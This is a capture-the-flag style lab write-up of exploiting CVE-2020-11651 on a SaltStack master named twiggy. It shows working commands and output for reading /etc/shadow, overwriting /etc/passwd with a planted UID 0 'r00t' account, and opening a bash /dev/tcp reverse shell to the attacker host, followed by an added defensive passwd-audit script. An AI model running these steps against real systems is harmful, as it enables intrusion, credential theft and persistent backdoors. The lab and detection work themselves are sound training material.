CVE-2020-11651


The target system was identified as vulnerable to CVE-2020-11651 because it runs an outdated SaltStack master whose request server (port 4506) is exposed to the network.

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --read /etc/shadow
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to read /etc/shadow from 192.168.113.62
root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::
bin:*:17834:0:99999:7:::
daemon:*:17834:0:99999:7:::
adm:*:17834:0:99999:7:::
lp:*:17834:0:99999:7:::
sync:*:17834:0:99999:7:::
shutdown:*:17834:0:99999:7:::
halt:*:17834:0:99999:7:::
mail:*:17834:0:99999:7:::
operator:*:17834:0:99999:7:::
games:*:17834:0:99999:7:::
ftp:*:17834:0:99999:7:::
nobody:*:17834:0:99999:7:::
systemd-network:!!:18400::::::
dbus:!!:18400::::::
polkitd:!!:18400::::::
sshd:!!:18400::::::
postfix:!!:18400::::::
chrony:!!:18400::::::
mezz:!!:18400::::::
nginx:!!:18400::::::
named:!!:18400::::::

Executing the exploit script to read the /etc/shadow file on the target system. Since /etc/shadow is readable only by root, the salt-master process appears to be running with the privileges of the root account.

Overwriting /etc/passwd


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ openssl passwd qwe123                
$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ cat fake_passwd               
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
r00t:$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.:0:0:root:/root:/bin/bash

Creating a copy of the passwd file that contains an additional UID 0 account, r00t, with the MD5-crypt hash ($1$) generated above by openssl passwd placed directly in the password field instead of the usual "x" that defers to /etc/shadow.

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --upload-src ./fake_passwd --upload-dest ../../../../etc/passwd
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to upload ./fake_passwd to ../../../../etc/passwd on 192.168.113.62
[ ] Wrote data to file /srv/salt/../../../../etc/passwd

Uploading fake_passwd over the /etc/passwd file of the target system; the destination path traverses out of the file root (/srv/salt), as the "Wrote data to file" line confirms.

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --read /etc/passwd               
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
[+] Attemping to read /etc/passwd from 192.168.113.62
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
r00t:$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.:0:0:root:/root:/bin/bash

Upload confirmed: reading /etc/passwd back shows that the target's file now matches fake_passwd, including the planted r00t entry.
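The planted r00t entry leaves two artifacts that a host-integrity check can catch: a second UID 0 account, and a password hash stored in /etc/passwd rather than in /etc/shadow. The following audit is an added example written for this write-up, not code from the exploit script or from the SaltStack project; the sample listing is a constructed subset of the /etc/passwd content read back from the target above.

```python
"""Audit an /etc/passwd listing for the tampering shown in this write-up.

Added example (not part of the original write-up or the SaltStack project).
Two checks catch the planted entry:
  * an account other than 'root' carrying UID 0
  * a password field that holds a hash instead of the 'x' that delegates
    the hash to /etc/shadow
"""
from typing import Dict, List

# Sample input: a constructed subset of the /etc/passwd listing read back from
# the target above; the planted r00t line is the last one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
operator:x:11:0:operator:/root:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
r00t:$1$.VyKllmX$wQ7Vros5MazgN9ZAXe0nA.:0:0:root:/root:/bin/bash
"""

# Password-field values that do not carry a hash: 'x' (hash lives in
# /etc/shadow) and the conventional locked-account markers.
NON_HASH_FIELDS = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd lines into their seven colon-separated fields.

    A line with the wrong field count raises instead of being skipped,
    because a malformed line in /etc/passwd is itself worth investigating.
    """
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name, "password": password, "uid": uid, "gid": gid,
            "gecos": gecos, "home": home, "shell": shell, "lineno": str(lineno),
        })
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious entry; an empty list means clean."""
    findings = []
    for e in parse_passwd(text):
        if not e["uid"].isdigit():
            findings.append(f"line {e['lineno']}: non-numeric UID for {e['name']!r}")
            continue
        # Any second UID 0 login is a backdoor candidate, whatever its shell.
        if int(e["uid"]) == 0 and e["name"] != "root":
            findings.append(
                f"line {e['lineno']}: extra UID 0 account {e['name']!r} "
                f"with shell {e['shell']}"
            )
        # On a shadow-enabled system the hash should never sit in passwd.
        if e["password"] not in NON_HASH_FIELDS:
            findings.append(
                f"line {e['lineno']}: {e['name']!r} carries a password hash "
                f"in /etc/passwd instead of /etc/shadow"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("[!]", finding)
    # On a live host, pass the real file instead:
    # audit_passwd(open("/etc/passwd").read())
```

Run against the sample, the audit reports the r00t line twice (extra UID 0 account, hash in passwd) and nothing else; running it periodically, or diffing /etc/passwd against a known-good copy, would flag the overwrite performed through the Salt file root.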

SSH


┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ ssh r00t@$IP                                           
The authenticity of host '192.168.113.62 (192.168.113.62)' can't be established.
ED25519 key fingerprint is SHA256:uYMZFN9vYkxFeoZ23/Znor6lCrABMH4HLFk4qNAIkB4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.113.62' (ED25519) to the list of known hosts.
r00t@192.168.113.62's password: qwe123
[root@twiggy ~]# whoami
root
[root@twiggy ~]# hostnamee
-bash: hostnamee: command not found
[root@twiggy ~]# hostname 
twiggy
[root@twiggy ~]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:6d:a0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.113.62/24 brd 192.168.113.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the root account by exploiting CVE-2020-11651. System level compromise.

Code Execution


┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ python3 CVE-2020-11651-poc/exploit.py --master $IP --exec 'bash -i >& /dev/tcp/192.168.45.192/8000 0>&1'
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/.venv/lib/python3.13/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.113.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: MM+k7kuD8qK7uY/FCqn+L+gPc6ScqcoJBfVShUUA3KGay3i/woG7skNXpMmON4009lLtSZ9DRlk=
/home/kali/PEN-200/PG_PRACTICE/twiggy/CVE-2020-11651-poc/exploit.py:351: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
[+] Attemping to execute bash -i >& /dev/tcp/192.168.45.192/8000 0>&1 on 192.168.113.62
[+] Successfully scheduled job: 20250311002527945322

Executing the exploit script with a reverse shell payload; the command is scheduled as a Salt job that the master runs on the target.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/twiggy]
└─$ nnc 8000
listening on [any] 8000 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.113.62] 54114
bash: no job control in this shell
[root@twiggy root]# whoami
whoami
root
[root@twiggy root]# hostname
hostname
twiggy
[root@twiggy root]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:65:1e brd ff:ff:ff:ff:ff:ff
    inet 192.168.113.62/24 brd 192.168.113.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise